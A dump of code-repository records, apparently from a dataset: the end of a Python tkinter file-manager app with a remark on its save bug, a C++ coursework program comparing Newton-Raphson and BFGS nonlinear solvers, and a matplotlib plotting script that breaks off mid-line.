height=5, bg=\"#34495E\", fg=\"white\", command=viewf)\r\n 
open_button.pack(side=LEFT)\r\n\r\n save_button = tk.Button(oscreen, text=\"Save File\", width=20, height=5, bg=\"#34495E\", fg=\"white\", command=savef)\r\n save_button.pack(side=LEFT)\r\n\r\n oscreen.mainloop()\r\n\r\n\r\ndef file_deleting():\r\n\r\n delete_text = dfile.get()\r\n\r\n directory = \"94682167846512318\"\r\n path_name = os.path.join(directory, delete_text + \".txt\")\r\n os.remove(path_name)\r\n\r\n dfile_input.delete(0, END)\r\n\r\n Label(dscreen, text=\"File Deleted\", fg=\"green\", font=(\"calibri, 12\")).pack()\r\n\r\n\r\ndef delf():\r\n\r\n global dscreen\r\n dscreen = Toplevel()\r\n dscreen.title(\"File Deleter\")\r\n dscreen.geometry(\"300x150\")\r\n\r\n global dfile\r\n global dfile_input\r\n dfile = StringVar()\r\n\r\n Label(dscreen, text=\"Enter below the name of the file you want to delete.\").pack()\r\n Label(dscreen, text=\"\").pack()\r\n Label(dscreen, text=\"File Name:\").pack()\r\n dfile_input = Entry(dscreen, textvariable=dfile)\r\n dfile_input.pack()\r\n del_file = tk.Button(dscreen, text=\"Delete File\", width=10, height=1, command=file_deleting)\r\n del_file.pack()\r\n\r\n\r\ndef main_screen():\r\n\r\n global screen\r\n screen = tk.Tk()\r\n screen.geometry(\"500x350\")\r\n screen.title(\"Data master\")\r\n screen.iconbitmap(r\"data.ico\")\r\n label = tk.Label(text=\"Welcome to Data master, please choose what you wish to do.\",\r\n bg=\"#34495E\", fg=\"white\", width=\"700\", height=\"3\", font=(\"Calibri\", 13))\r\n label.pack()\r\n\r\n Label(text=\"\").pack()\r\n newFile = tk.Button(text=\"New File\", width=15, height=2, bg=\"#34495E\", fg=\"white\", font=(\"Calibri\", 13),\r\n command=newf)\r\n newFile.pack()\r\n Label(text=\"\").pack()\r\n viewFile = tk.Button(text=\"View File\", width=15, height=2, bg=\"#34495E\", fg=\"white\", font=(\"Calibri\", 13),\r\n command=openf)\r\n viewFile.pack()\r\n Label(text=\"\").pack()\r\n deleteFile = tk.Button(text=\"Delete File\", width=15, height=2, bg=\"#34495E\", fg=\"white\", font=(\"Calibri\", 13),\r\n command=delf)\r\n deleteFile.pack()\r\n\r\n screen.mainloop()\r\n\r\n\r\nmain_screen()\r\n" } ]
1
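In Data master.py above, the savef helper opens the chosen file for writing but then inserts the integer returned by write() back into the Text widget. Below is a hedged sketch of what the save routine likely intends, leaving the widget untouched after saving; the widget and button names are illustrative, not the original app's.

import tkinter as tk
from tkinter import filedialog

def save_text(widget):
    # asksaveasfilename returns an empty string if the dialog is cancelled
    path = filedialog.asksaveasfilename(defaultextension=".txt",
                                        filetypes=(("Text File", "*.txt"),))
    if not path:
        return
    # write() returns a character count, not text, so nothing is
    # inserted back into the widget after saving
    with open(path, "w") as f:
        f.write(widget.get("1.0", tk.END))

root = tk.Tk()
my_text = tk.Text(root, width=40, height=10)
my_text.pack()
tk.Button(root, text="Save File", command=lambda: save_text(my_text)).pack()
root.mainloop()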
MDBrothers/nonlinear_solvers
https://github.com/MDBrothers/nonlinear_solvers
0810cd82926d0318c3cf1094fba73d9e115b59ee
4dda1fa7446405eb6b7d7f1914a4d34c38a3ab5a
77df1921445952d3c23d6e55261c78e777702167
refs/heads/master
2021-01-10T17:00:54.856429
2016-04-05T01:33:50
2016-04-05T01:33:50
53,368,969
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5609637498855591, "alphanum_fraction": 0.5734963417053223, "avg_line_length": 36.1491813659668, "blob_id": "bfd649e46cd3b179c04d75389d49ad204ef5914a", "content_id": "07f8eb7beaeea889245bda33e76d3f44308d59e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 22661, "license_type": "no_license", "max_line_length": 128, "num_lines": 610, "path": "/mbrothers_nlfea_hw_5.cpp", "repo_name": "MDBrothers/nonlinear_solvers", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <vector>\n#include <exception>\n#include \"/home/mbrothers/Projects/armadillo/include/armadillo\"\n//#include <armadillo>\n#include <sstream>\n#include <fstream>\n#include <string>\n#include <iostream>\n\n#define MAX_ITRS 14\n\n/* File output */\ntemplate <typename scalarT>\nvoid writeCSVContents(const std::string filename, std::vector<scalarT>& container, unsigned NCOLS)\n{\n try{\n\n std::ofstream outfile;\n outfile.open( filename, std::ios::app );\n\n const unsigned ContainerLength= container.size();\n if(not ((ContainerLength % NCOLS)==0)) throw 121;\n\n if(outfile){\n for(unsigned containerIndex(0); containerIndex<ContainerLength; ){\n for(unsigned lineIndex(0); lineIndex < (NCOLS-1); ++lineIndex){\n outfile << container[containerIndex++] << \", \";\n }\n outfile << container[containerIndex++] << \"\\n\";\n }\n }\n outfile.close();\n }\n catch(int e){\n std::cout << \"An exception occured. Nr. \" << e << '\\n';\n }\n}\n//template void writeCSVContents<double>( const std::string filename, std::vector<double>& container, unsigned NCOLS);\n//template void writeCSVContents<std::string>( const std::string filename, std::vector<std::string>& container, unsigned NCOLS);\n\n\n/* Per the problem statement, compute the elements of N */\nvoid eval_N(arma::vec::fixed<2> &myN,\n const arma::vec::fixed<2> &myd,\n const double myx)\n{\n myN[0] = myx*myd[0]*myd[0]*myd[0] - 2.0*myd[1]*myd[1] + 5.6*myd[0];\n myN[1] = myd[1] - myd[0];\n}\n\n/* Compute the elements of the tangent stiffness matrix using centered finite difference. */\nvoid compute_jacobian(arma::mat::fixed<2,2> &myTS,\n arma::vec::fixed<2> &myd, const double myx,\n const double myeps)\n{\n arma::vec::fixed<2> neg_pert_N, pos_pert_N;\n arma::vec::fixed<2> unperturbed_d;\n\n unperturbed_d = myd;\n\n myd[0] += myeps;\n eval_N(pos_pert_N, myd, myx);\n myd[0] = unperturbed_d[0];\n\n myd[0] -= myeps;\n eval_N(neg_pert_N, myd, myx);\n myd[0] = unperturbed_d[0];\n\n /* dN1/dd1 and dN2/dd1 */\n myTS.col(0) = (pos_pert_N - neg_pert_N)/(2.0*myeps);\n\n myd[1] += myeps;\n eval_N(pos_pert_N, myd, myx);\n myd[1] = unperturbed_d[1];\n\n myd[1] -= myeps;\n eval_N(neg_pert_N, myd, myx);\n myd[1] = unperturbed_d[1];\n\n /* dN1/dd2 and dN2/dd2 */\n myTS.col(1) = (pos_pert_N - neg_pert_N)/(2.0*myeps);\n}\n\n/* eval the res according to the criterion as in the problem statement. 
*/\nbool converged(const arma::vec::fixed<2> &myres,\n const double myeps,\n const double frst_res_nrm,\n double &myres_nrm)\n{\n myres_nrm = arma::norm(myres, 2);\n return myres_nrm <= (myeps*frst_res_nrm);\n}\n\nvoid save_soln(std::vector< arma::vec::fixed<2> > &myd_vectors,\n const arma::vec::fixed<2> &myd)\n{\n myd_vectors.push_back(myd);\n}\n\nvoid comp_and_store_v_BFGS(std::vector<arma::vec::fixed<2> > &myv_BFGS,\n const arma::vec::fixed<2> &mydelta_d,\n const arma::vec::fixed<2> &mydelta_R)\n{\n myv_BFGS.push_back(mydelta_d/(arma::dot(mydelta_d, mydelta_R)));\n}\n\nvoid comp_and_store_w_BFGS(std::vector<arma::vec::fixed<2> > &myw_BFGS,\n const arma::vec::fixed<2> &mydelta_R,\n const arma::vec::fixed<2> &myR,\n const double myalpha)\n{\n myw_BFGS.push_back(myalpha*myR - mydelta_R);\n}\n\nvoid comp_and_store_alpha_BFGS(std::vector<double> &myalpha_BFGS,\n const arma::vec::fixed<2> &mydelta_d,\n const arma::vec::fixed<2> &mydelta_R,\n const arma::vec::fixed<2> &myR,\n const double mys)\n{\n myalpha_BFGS.push_back(std::sqrt(-mys*arma::dot(mydelta_R, mydelta_d)/\n arma::dot(myR, mydelta_d)));\n}\n\nint main(){\n /* Basic data structures used for each problem part */\n arma::mat::fixed<2,2> jacobian;\n arma::vec::fixed<2> int_frc, d, delta_d, ext_frc;\n\n /* For each part of the problem, 'numerical' d values.*/\n std::vector< arma::vec::fixed<2> > d_pure_NR;\n std::vector< arma::vec::fixed<2> > d_moded_NR;\n std::vector< arma::vec::fixed<2> > d_moded_NR_wls;\n std::vector< arma::vec::fixed<2> > d_moded_NR_BFGS;\n std::vector< arma::vec::fixed<2> > d_moded_NR_BFGS_wls;\n\n /* Num iterations per load step */\n std::vector<int> itrs_pure_NR;\n std::vector<int> itrs_moded_NR;\n std::vector<int> itrs_moded_NR_wls;\n std::vector<int> itrs_moded_NR_BFGS;\n std::vector<int> itrs_moded_NR_BFGS_wls;\n\n /* The BFGS vectors for part four */\n std::vector< arma::vec::fixed<2> > BFGS_v;\n std::vector< arma::vec::fixed<2> > BFGS_w;\n std::vector< double > BFGS_alpha;\n\n /* Initialize the reusable data structures to zero and give values to the control constants*/\n jacobian.zeros(); int_frc.zeros(); d.zeros(); delta_d.zeros();\n ext_frc.zeros();\n const int num_load_steps(40);\n const double load_increment(0.25), x(0.19), eps_conv(1.E-4), eps_probe(1.E-8);\n\n pure:\n /********************************/\n /*Solve with pure Newton Raphson*/\n /********************************/\n std::cout << \"\\nNew Method: pure Newton Raphson\" << std::endl;\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step*/\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . */\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the consistent tangent stiffness matrix */\n compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Solve for the update vector, then update d */\n d += arma::solve(jacobian, ext_frc - int_frc);\n\n /* Have we reached an acceptable soln? 
*/\n eval_N(int_frc, d, x);\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_pure_NR, d);\n itrs_pure_NR.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n /* The residual is undefined, apply more load steps */\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing anyway.\" << std::endl;\n\n /* The method as applied has broken down, warn the user but continue applying load steps */\n if(itr == MAX_ITRS - 1){\n \tstd::cout << \"**** max num ITRS exceeded, applying another loadstep.\" << std::endl;\n\t\t\t\tsave_soln(d_pure_NR, d);\n\t\t\t\titrs_pure_NR.push_back(itr + 1);\n\t\t\t}\n\t\t}\n }\n\n moded:\n\n /************************************/\n /*Solve with moded Newton Raphson */\n /************************************/\n std::cout << \"\\nNew Method: moded Newton Raphson\" << std::endl;\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . */\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itr*/\n if(itr == 0) compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Solve for the update vector, then update d */\n d += arma::solve(jacobian, ext_frc - int_frc);\n\n /* Have we reached an acceptable soln? */\n eval_N(int_frc, d, x);\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR, d);\n itrs_moded_NR.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n \tstd::cout << \"**** max num ITRS exceeded, apply more load steps\" << std::endl;\n save_soln(d_moded_NR, d);\n itrs_moded_NR.push_back(itr + 1);\n }\n }\n }\n\n moded_wls:\n\n /*****************************************************/\n /*Solve with moded Newton Raphson with line search*/\n /*****************************************************/\n std::cout << \"\\nNew Method: moded Newton Raphson with line search\" << std::endl;\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. 
*/\n for(int step(0); step < num_load_steps; step++){\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . */\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itertation */\n if(itr == 0) compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Solve for the update vector, then initialize the line search */\n delta_d = arma::solve(jacobian, ext_frc - int_frc);\n double srch_prm(1.0), G_zero(0);\n bool ln_srch_win(false);\n G_zero = arma::dot(delta_d, ext_frc - int_frc);\n\n /* Perform the line search, exit if failed */\n for(int search_it(0); search_it < 5; search_it++){\n eval_N(int_frc, d + srch_prm*delta_d, x);\n if(std::abs(arma::dot(delta_d, ext_frc - int_frc)) <\n std::abs(.5*G_zero)){\n d += delta_d*srch_prm; ln_srch_win = true; break;\n }\n else srch_prm*=1.0/std::sqrt(2.0); //Always try a smaller step.\n }\n if(ln_srch_win == false)\n std::cout << \"**** line search failed, going with the last guess\" << std::endl;\n\n /* Have we reached an acceptable soln? */\n eval_N(int_frc, d, x);\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR_wls, d);\n itrs_moded_NR_wls.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n std::cout << \"**** max num ITRS exceeded, apply more load steps\" << std::endl;\n save_soln(d_moded_NR_wls, d);\n itrs_moded_NR_wls.push_back(itr + 1);\n }\n }\n }\n\n moded_bfgs:\n\n /**********************************************/\n /*Solve with moded Newton Raphson with BFGS*/\n /**********************************************/\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n std::cout << \"\\nNew Method: moded Newton Raphson with BFGS\" << std::endl;\n\n /* Some variables needed for BFGS */\n arma::vec::fixed<2> delta_R;\n arma::vec::fixed<2> previous_R;\n arma::vec::fixed<2> current_R;\n arma::mat::fixed<2,2> lh_BFGS_matrix, rh_BFGS_matrix;\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. */\n for(int step(0); step < num_load_steps; step++){\n\n /* Clear previous accumulated BFGS update matricesy */\n delta_R.zeros();\n previous_R.zeros();\n current_R.zeros();\n rh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n lh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n BFGS_v.clear();\n BFGS_w.clear();\n BFGS_alpha.clear();\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \" << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d, if we fail, . 
*/\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the res for no update in d */\n eval_N(int_frc, d, x);\n previous_R = ext_frc - int_frc;\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itr*/\n if(itr == 0){\n compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Invert the jacobian and solve for delta_d */\n jacobian = arma::inv(jacobian);\n delta_d = jacobian*(ext_frc - int_frc);\n d += delta_d;\n }\n else{\n\n /* solve for delta_d, then update d */\n delta_d = lh_BFGS_matrix*jacobian*rh_BFGS_matrix*current_R;\n d += delta_d;\n }\n\n /* Store the update information */\n eval_N(int_frc, d, x);\n current_R = ext_frc - int_frc;\n delta_R = current_R - previous_R;\n\n /* compute the BFGS update vectors */\n comp_and_store_alpha_BFGS(BFGS_alpha, delta_d, delta_R, previous_R, 1.0);\n comp_and_store_v_BFGS(BFGS_v, delta_d, delta_R);\n comp_and_store_w_BFGS(BFGS_w, delta_R, previous_R, BFGS_alpha.back());\n\n /* Update the BFGS update matrices */\n lh_BFGS_matrix = (arma::eye< arma::mat >(2,2) +\n BFGS_v.back()*(BFGS_w.back().t()) )*lh_BFGS_matrix;\n rh_BFGS_matrix = rh_BFGS_matrix*(arma::eye< arma::mat >(2,2) +\n BFGS_w.back()*(BFGS_v.back().t()) );\n\n /* Test for Conv */\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR_BFGS, d);\n itrs_moded_NR_BFGS.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n std::cout << \"**** max num ITRS exceeded, apply more loadsteps\" << std::endl;\n save_soln(d_moded_NR_BFGS, d);\n itrs_moded_NR_BFGS.push_back(itr + 1);\n }\n }\n }\n\n moded_bfgs_wls:\n\n /**************************************************************/\n /*Solve with moded Newton Raphson with BFGS and line search*/\n /**************************************************************/\n jacobian.zeros(), int_frc.zeros(), d.zeros(), delta_d.zeros(), ext_frc.zeros();\n std::cout << \"\\nNew Method: moded Newton Raphson with BFGS and line search\" << std::endl;\n\n /* Apply each of the load steps and attempt to find d to the specified tolerance. 
*/\n for(int step(0); step < num_load_steps; step++){\n\n /* Clear previous accumulated BFGS update matricesy */\n delta_R.zeros();\n previous_R.zeros();\n current_R.zeros();\n rh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n lh_BFGS_matrix = arma::eye< arma::mat >(2,2);\n BFGS_v.clear();\n BFGS_w.clear();\n BFGS_alpha.clear();\n\n /* Update the load vector */\n ext_frc[0] = (1+step)*load_increment;\n\n /* Compute the frst res of the load step */\n eval_N(int_frc, d, x);\n double frst_res_nrm = arma::norm(ext_frc - int_frc, 2);\n double res_nrm(0.0);\n std::cout << \"\\nStep: \" << step + 1 << \" Conv criterion: \"\n << frst_res_nrm*eps_conv << std::endl;\n\n /* Attempt to iteratively solve for d,*/\n for(int itr(0); itr < MAX_ITRS; itr++){\n\n /* Compute the res for no update in d */\n eval_N(int_frc, d, x);\n previous_R = ext_frc - int_frc;\n\n /* Compute the consistent tangent stiffness matrix but only on the frst itr*/\n if(itr == 0){\n compute_jacobian(jacobian, d, x, eps_probe);\n\n /* Invert the jacobian and solve for delta_d */\n jacobian = arma::inv(jacobian);\n delta_d = jacobian*(ext_frc - int_frc);\n }\n else{\n /* solve for delta_d, then update d */\n delta_d = lh_BFGS_matrix*jacobian*rh_BFGS_matrix*current_R;\n }\n\n /* Initialize the line search */\n double srch_prm(1.0), G_zero(0);\n bool ln_srch_win(false);\n G_zero = arma::dot(delta_d, previous_R);\n\n /* Perform the line search, exit if failed */\n for(int search_it(0); search_it < 5; search_it++){\n eval_N(int_frc, d + srch_prm*delta_d, x);\n if(std::abs(arma::dot(delta_d, ext_frc - int_frc)) <\n std::abs(.5*G_zero)){\n d += delta_d*srch_prm; ln_srch_win = true; break;\n }\n else srch_prm*=1.0/std::sqrt(2.0); //Always try a smaller step.\n }\n if(ln_srch_win == false)\n std::cout << \"**** line search failed, going on with last guess\" << std::endl;\n\n /* Store the update information */\n current_R = ext_frc - int_frc;\n delta_R = current_R - previous_R;\n\n /* compute the BFGS update vectors */\n comp_and_store_alpha_BFGS(BFGS_alpha, delta_d, delta_R, previous_R, srch_prm);\n comp_and_store_v_BFGS(BFGS_v, delta_d, delta_R);\n comp_and_store_w_BFGS(BFGS_w, delta_R, previous_R, BFGS_alpha.back());\n\n /* Update the BFGS update matrices */\n lh_BFGS_matrix = (arma::eye< arma::mat >(2,2) +\n BFGS_v.back()*(BFGS_w.back().t()) )*lh_BFGS_matrix;\n rh_BFGS_matrix = rh_BFGS_matrix*(arma::eye< arma::mat >(2,2) +\n BFGS_w.back()*(BFGS_v.back().t()) );\n\n /* Test for Conv */\n if(converged(ext_frc - int_frc, eps_conv, frst_res_nrm, res_nrm)){\n save_soln(d_moded_NR_BFGS_wls, d);\n itrs_moded_NR_BFGS_wls.push_back(itr + 1);\n std::cout <<\"\\tconverged: \" << itr << \" res: \" << res_nrm << std::endl;\n break; //Exit inner loop and re-enter the load step loop because we have succeeded.\n }\n std::cout <<\"\\titr: \" << itr << \" res: \" << res_nrm << std::endl;\n if(res_nrm!=res_nrm)\n std::cout << \"**** NAN in resdiual eval, continuing\" << std::endl;\n\n /* The method as applied has broken down, warn the user */\n if(itr == MAX_ITRS - 1){\n std::cout << \"**** max num ITRS exceeded, apply more load steps\" << std::endl;\n save_soln(d_moded_NR_BFGS_wls, d);\n itrs_moded_NR_BFGS_wls.push_back(itr + 1);\n }\n }\n }\n\n end:\n\n /*output the numbers generated */\n std::vector<std::string> labels;\n labels.push_back(\"d_NR\");\n labels.push_back(\"N_NR\");\n writeCSVContents<std::string>(\"pure_nr_x19.txt\", labels, 2);\n for(const auto & soln : d_pure_NR){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = 
soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"pure_nr_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters pure nr\");\n writeCSVContents<std::string>(\"pure_nr_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"pure_nr_x19_conv.txt\", itrs_pure_NR, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR\");\n labels.push_back(\"N_moded_NR\");\n writeCSVContents<std::string>(\"moded_nr_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr\");\n writeCSVContents<std::string>(\"moded_nr_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_x19_conv.txt\", itrs_moded_NR, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR_wls\");\n labels.push_back(\"N_moded_NR_wls\");\n writeCSVContents<std::string>(\"moded_nr_wls_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR_wls){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_wls_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr wls\");\n writeCSVContents<std::string>(\"moded_nr_wls_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_wls_x19_conv.txt\", itrs_moded_NR_wls, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR_BFGS\");\n labels.push_back(\"N_moded_NR_BFGS\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR_BFGS){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_bfgs_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr bfgs\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_bfgs_x19_conv.txt\", itrs_moded_NR_BFGS, 1);\n\n labels.clear();\n labels.push_back(\"d_moded_NR_BFGS_wls\");\n labels.push_back(\"N_moded_NR_BFGS_wls\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_wls_x19.txt\", labels, 2);\n for(const auto & soln : d_moded_NR_BFGS_wls){\n std::vector<double> record;\n record.push_back( soln[0]);\n d[0] = soln[0]; d[1] = soln[0];\n eval_N(int_frc, d, x);\n record.push_back(int_frc[0]);\n writeCSVContents<double>(\"moded_nr_bfgs_wls_x19.txt\",record,2);\n }\n labels.clear();\n labels.push_back(\"num iters moded nr bfgs wls\");\n writeCSVContents<std::string>(\"moded_nr_bfgs_wls_x19_conv.txt\", labels, 1);\n writeCSVContents<int>(\"moded_nr_bfgs_wls_x19_conv.txt\", itrs_moded_NR_BFGS_wls, 1);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6072607040405273, "alphanum_fraction": 0.6695086359977722, "avg_line_length": 37.13985824584961, "blob_id": "1de119d80390ce24df0083164ffa00747d773f18", "content_id": "75adf512232b2f3f523c8a61ab61ae296bdda78e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10908, "license_type": "no_license", "max_line_length": 253, "num_lines": 286, "path": "/generate_plots.py", "repo_name": "MDBrothers/nonlinear_solvers", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport numpy as 
np\nimport matplotlib as mpl\nfrom tabulate import tabulate\n\n\nmpl.use('pgf')\n\ndef figsize(scale):\n fig_width_pt = 550.0 # Get this from LaTeX using \\the\\textwidth\n inches_per_pt = 1.0/72.27 # Convert pt to inch\n golden_mean = (np.sqrt(5.0)-1.0)/2.0 # Aesthetic ratio (you could change this)\n fig_width = fig_width_pt*inches_per_pt*scale # width in inches\n fig_height = fig_width*golden_mean # height in inches\n fig_size = [fig_width,fig_height]\n return fig_size\n\npgf_with_latex = { # setup matplotlib to use latex for output\n \"pgf.texsystem\": \"pdflatex\", # change this if using xetex or lautex\n \"text.usetex\": True, # use LaTeX to write all text\n \"font.family\": \"serif\",\n \"font.serif\": [], # blank entries should cause scatters to inherit fonts from the document\n \"font.sans-serif\": [],\n \"font.monospace\": [],\n \"axes.labelsize\": 10, # LaTeX default is 10pt font.\n \"text.fontsize\": 10,\n \"legend.fontsize\": 8, # Make the legend/label fonts a little smaller\n \"xtick.labelsize\": 8,\n \"ytick.labelsize\": 8,\n \"figure.figsize\": figsize(0.9), # default fig size of 0.9 textwidth\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts becasue your computer can handle it :)\n r\"\\usepackage[T1]{fontenc}\", # scatters will be generated using this preamble\n ]\n }\nmpl.rcParams.update(pgf_with_latex)\n\nimport matplotlib.pyplot as plt\n\ndef N_explicit(myd1, x):\n return x*np.power(myd1,3.0) -2.0*np.power(myd1, 2.0) +5.6*myd1\n\n# I make my own newfig and savefig functions\ndef newfig(width):\n plt.clf()\n fig = plt.figure(figsize=figsize(width))\n ax = fig.add_subplot(111)\n return fig, ax\n\ndef savefig(filename):\n plt.savefig('{}.pdf'.format(filename))\n\n\n# Simple scatter\nfig, ax = newfig(0.6)\n\npure_nr_x19 = np.loadtxt(\"pure_nr_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_x19 = np.loadtxt(\"moded_nr_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_wls_x19 = np.loadtxt(\"moded_nr_wls_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_x19 = np.loadtxt(\"moded_nr_bfgs_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\nmoded_nr_bfgs_wls_x19 = np.loadtxt(\"moded_nr_bfgs_wls_x19.txt\",delimiter=\",\",skiprows=1,ndmin=2)\n\n\nheader = [\"pure d\", \"pure N\",\"modified d\", \"modified N\",\"modified wls d\", \"modified wls N\",\"BFGS d\", \"BFGS N\",\"BFGS wls d\", \"BFGS wls N\"]\ncontent = np.array([pure_nr_x19[:,0], pure_nr_x19[:,1], moded_nr_x19[:,0], moded_nr_x19[:,1], moded_nr_wls_x19[:,0], moded_nr_wls_x19[:,1], moded_nr_bfgs_x19[:,0], moded_nr_bfgs_x19[:,1], moded_nr_bfgs_wls_x19[:,0], moded_nr_bfgs_wls_x19[:,1]], ndmin=2)\nprint \"\\\\begin{figure}\"\nprint tabulate(content.transpose(), header, tablefmt=\"latex\")\nprint \"\\\\caption{Solution approximations, $x=.19$}\"\nprint \"\\\\end{figure}\"\n\nax.scatter(pure_nr_x19[:,0], pure_nr_x19[:,1])\nax.plot(np.linspace(0,8.0, 100), N_explicit(np.linspace(0,8.0,100), 